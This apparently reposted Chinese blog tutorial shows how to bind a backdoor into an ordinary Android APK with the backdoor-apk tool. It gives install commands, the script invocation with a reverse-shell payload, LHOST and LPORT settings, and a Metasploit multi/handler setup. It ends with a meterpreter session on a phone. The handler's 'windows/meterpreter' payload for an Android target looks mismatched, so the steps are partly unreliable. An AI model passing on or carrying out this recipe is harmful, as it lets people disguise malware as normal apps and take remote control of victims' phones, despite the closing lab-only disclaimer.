armv7l安卓刷linux,技术讲解-安卓APK快速生成后门(实现手机入侵)

Hello,朋友们大家好,欢迎来到LIUSE网络。

对于渗透测试来讲,一个成功的Backdoor(后门)是非常有价值的!那么今天Liuse就带领大家一起来学习基于安卓apk的后门制作。对于不知道什么是“后门”的同学,请去墙角面壁思过三分钟。什么是后门:后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径。等于你买了开发商一套房子,开发商在你家后院挖了一条秘密通道,可以随时进出。

9353b6b0918ec634b418efd0b15044b7.png

在常规情况下,如果我们要想将一个正常无毒的apk文件嵌入进去恶意代码、或者嵌入恶意payload的话那务必要我们动手先去反编译apk文件,找到文件执行入口,并在activety中添加启动PAYLOAD。这对于入门小白来讲是十分的费劲!如此说来,是不是就要凉凉了?NONONONO,接下来鄙人给大家介绍一款神器backdoor-apk!

b2c378ee7f0d557f4512d938a57e510f.png

backdoor-apk 从名字上我们就能猜到用途了,没错就是用来制作 APK 后门的。这个工具,非常简单易用,比手动去找关键点速度多了,完全傻瓜式操作!

首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:

注:这里推荐使用kali系统,后面要用到metasploit,如果你闲麻烦就用kali最方便,你要喜欢折腾用其它的也可以apt-get install lib32stdc++6 lib32ncurses5 lib32z1 #安装lib依赖

a644cb8012a009e06ca8431f00f56cbf.png

这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!

c8bb6fa6e80b0833d908b15095befc47.png

在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!git clone https://github.com/dana-at-cp/backdoor-apk.git #从github下载程序源码

c3f7bacf8b067fa7b873b455643b1fc0.png

下载完成后我们进入到其文件目录下:

cd backdoor-apk/

cd backdoor-apk/

f9f85760aef9b9131477d009f36d98fc.png

在当前目录下,我们可以看到一个脚本文件。这里,我们需要提前准备一个用来绑定后门的 APK 文件(这个文件是什么都可以,可以是企鹅、可以是K歌随你来)。./backdoor-apk.sh /root/secist.apk #启动backdoor

选择 3 payload #选择攻击载荷

LHOST:192.168.15.131 #设置IP

LPORT:4444 #设置端口

3e7fbb5c8c7edefbbad883efaf88e8fa.png

成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist目录下!下面我们来启动侦听:

在kali打开metasploituse exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.131

set lport 4444

exploit

d6cf5066f3796c31fd9827e9b54d3320.png

同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!

如果没有出错的话,现在你的软件是可以正常使用的,只不过,在后台你植入的backdoor也已经运行起来了,并返回给指定地址一个shell。

打开软件后,很快的我们的kali下也会有提示并返回一个meterperter,这说明我们已经获取到shell了!

03fac135e83be020d919c91bb85e2379.png

简单输入一个,查看系统信息的命令:

sysinfo

可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。

a2588b541ea17576c11cda5d2478229a.png

注:文章有一定攻击性,旨在学习网络安全。请大家在虚拟环境下测试,切勿用于违法犯罪!维护网络安全,是你我共同的责任!

??以上部分素材来自“即刻安全”。

  • 0
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值